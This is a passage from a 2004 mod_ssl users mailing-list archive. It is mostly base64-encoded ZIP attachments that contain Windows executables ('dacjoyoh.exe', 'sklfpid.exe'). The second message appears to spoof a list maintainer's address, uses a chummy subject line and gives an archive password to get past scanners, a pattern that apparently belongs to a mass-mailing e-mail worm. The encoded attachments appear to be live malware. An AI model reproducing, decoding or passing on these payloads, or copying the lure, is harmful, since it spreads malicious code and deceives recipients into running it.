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

----------wlvgqghqknckpvwwewtv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  3 04:00:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9A007A8A97; Wed,  3 Mar 2004 04:00:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sky2 (pcp08459000pcs.avenel01.nj.comcast.net [69.136.177.37])
	by master.modssl.org (Postfix) with SMTP id E9E3BA8A93
	for ; Wed,  3 Mar 2004 04:00:09 +0100 (CET)
Date: Tue, 02 Mar 2004 22:00:06 -0500
To: modssl-users@modssl.org
Subject: Hey, dude, it's me ^_^ :P
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------wpvweimygyhatdvywxsf"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------wpvweimygyhatdvywxsf
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh,  i  don't  like the plaintext :)

password for archive: 10570

----------wpvweimygyhatdvywxsf
Content-Type: application/octet-stream; name="Msg.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Msg.zip"

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
